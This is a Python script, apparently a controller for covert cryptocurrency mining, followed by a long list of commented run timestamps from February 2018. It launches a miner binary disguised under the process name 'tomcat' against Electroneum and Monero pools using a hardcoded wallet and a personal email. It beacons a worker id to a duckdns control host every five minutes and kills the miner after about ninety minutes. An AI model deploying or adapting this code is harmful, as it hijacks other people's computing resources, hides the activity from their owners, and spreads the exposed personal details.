import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:02:01.731853
#2018-02-17 16:47:08.121690
#2018-02-17 18:35:08.626246
#2018-02-17 20:23:05.097339
#2018-02-17 22:10:03.393190
#2018-02-17 23:53:05.469223
#2018-02-18 01:43:04.606895
#2018-02-18 03:32:04.021144
#2018-02-18 05:19:04.242628
#2018-02-18 07:11:04.368934
#2018-02-18 08:59:01.711092
#2018-02-18 10:46:06.383528
#2018-02-18 12:29:06.063893
#2018-02-18 14:17:07.583408
#2018-02-18 16:09:05.840863
#2018-02-18 17:59:01.586916
#2018-02-18 19:45:08.901517
#2018-02-18 21:31:02.088931
#2018-02-18 23:18:06.932850
#2018-02-19 01:06:01.535961
#2018-02-19 02:52:02.117193
#2018-02-19 04:39:03.399024
#2018-02-19 06:23:07.390223
#2018-02-19 08:12:01.518779
#2018-02-19 10:02:07.386893
#2018-02-19 11:52:01.483172
#2018-02-19 13:40:10.800222
#2018-02-19 15:29:09.311394
#2018-02-19 17:18:04.004686
#2018-02-19 19:07:07.109061
#2018-02-19 20:54:03.867881
#2018-02-19 22:43:05.343718
#2018-02-20 00:26:04.374469
#2018-02-20 02:15:01.399433
#2018-02-20 04:06:01.678616
#2018-02-20 05:49:07.801632
#2018-02-20 07:35:07.535750
#2018-02-20 09:20:01.763080
#2018-02-20 11:04:08.753690
#2018-02-20 12:51:01.804809
#2018-02-20 14:36:01.640535
#2018-02-20 16:23:01.425045
#2018-02-20 18:09:07.284873
#2018-02-20 19:59:05.021595
#2018-02-20 21:47:01.684950
#2018-02-20 23:28:07.160755
#2018-02-21 01:13:06.836715
#2018-02-21 03:01:08.890018
#2018-02-21 04:49:07.502041
#2018-02-21 06:33:05.021399
#2018-02-21 08:18:07.761139
#2018-02-21 10:04:06.044467
#2018-02-21 11:51:06.369345
#2018-02-21 13:43:01.230706
#2018-02-21 15:28:08.282130
#2018-02-21 17:20:07.455605
#2018-02-21 19:08:06.512742
#2018-02-21 20:56:06.733188
#2018-02-21 22:43:07.326771
#2018-02-22 00:32:03.962865
#2018-02-22 02:21:01.859556
#2018-02-22 04:07:04.336235
#2018-02-22 05:52:03.953499
#2018-02-22 07:37:07.818092
#2018-02-22 09:26:05.533670
#2018-02-22 11:12:04.598018
#2018-02-22 12:58:06.220846
#2018-02-22 14:46:01.430276
#2018-02-22 16:32:06.719731
#2018-02-22 18:19:01.439563
#2018-02-22 20:12:10.112791
#2018-02-22 22:01:01.407949
#2018-02-22 23:49:07.798189
#2018-02-23 01:38:03.969977
#2018-02-23 03:24:05.683873
#2018-02-23 05:11:06.931934
#2018-02-23 06:57:04.781883
#2018-02-23 08:48:04.211744
#2018-02-23 11:09:05.139687
#2018-02-23 13:05:01.302650
#2018-02-23 14:50:07.550395
#2018-02-23 16:39:09.267228
#2018-02-23 18:25:07.533752
#2018-02-23 20:11:05.452429
#2018-02-23 22:02:04.645065
#2018-02-23 23:52:02.079344
#2018-02-24 01:41:01.304168
#2018-02-24 03:31:07.076469
#2018-02-24 05:16:02.172541
#2018-02-24 07:05:06.480592
#2018-02-24 08:52:01.538660
#2018-02-24 10:54:03.529308
#2018-02-24 12:42:04.300837
#2018-02-24 14:31:04.851578
#2018-02-24 16:18:03.384856
#2018-02-24 18:12:07.874954
#2018-02-24 19:58:01.553706
#2018-02-24 21:41:07.290421
#2018-02-25 00:34:04.127895
#2018-02-25 04:20:07.492791
#2018-02-25 07:51:07.160377